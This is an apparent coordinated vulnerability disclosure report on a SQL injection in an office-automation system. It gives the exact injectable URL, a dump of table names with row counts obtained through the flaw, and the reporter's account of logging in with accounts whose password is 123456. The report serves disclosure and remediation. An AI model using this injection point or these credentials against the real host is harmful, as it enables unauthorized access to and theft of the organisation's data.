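2015-10-18: Details reported to the vendor; awaiting vendor response
2015-10-21: Vendor confirmed; details disclosed only to the vendor
2015-10-31: Details disclosed to core white hats and experts in related fields
2015-11-10: Details disclosed to regular white hats
2015-11-20: Details disclosed to intern white hats
2015-12-05: Details disclosed to the public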
As the title says.
Injection point: http://www.scrcoa.com/yyoa/common/js/menu/test.jsp?doType=101&S1=*
A few of the tables and their row counts:
+-----------------------------+-----------+
| Table                       | Entries   |
+-----------------------------+-----------+
| udt_nodeprocinfo            | 630980414 |
| nodetactics                 | 10352016  |
| p_nodetactics               | 8655792   |
| flownode                    | 8438522   |
| udt_node                    | 7958054   |
| flownode_member             | 4643323   |
| flow_branch                 | 4322367   |
| assess_node                 | 3215250   |
| p_flownode                  | 2744113   |
| p_flownode_member           | 2604131   |
| flow_log                    | 1944099   |
| attachment_all              | 1181994   |
| arc_folderitem              | 971319    |
| boardsumnew                 | 891519    |
| document                    | 652701    |
| p_document                  | 508623    |
| commonnumbers               | 482579    |
| oalogin                     | 438647    |
| oalogs                      | 327689    |
| hj_document_file            | 314080    |
| udt_flow                    | 289991    |
| urge_item                   | 247343    |
| urger                       | 247343    |
| sms_log                     | 190318    |
| smssendcha                  | 190265    |
| doc_bbs                     | 92027     |
| board_potent                | 74784     |
| assess_member               | 71374     |
| arc_myfavorite              | 69799     |
| assess_document             | 41796     |
| portlet_channel_cfg         | 39548     |
| utd_00245                   | 37228     |
| publicinfobrowsehis         | 33353     |
| utd_00322                   | 31382     |
| utd_00456                   | 29966     |
| messagehistory              | 29462     |
| doc_appendix                | 29460     |
| utm_00245                   | 24729     |
| rel_info                    | 24434     |
Then I logged in and had a look: lots of weak passwords, all of them 123456.
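Filter the input.
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-10-21 20:40
Thanks to the vulnerability reporter; the subsidiary company has been notified to remediate.
None yet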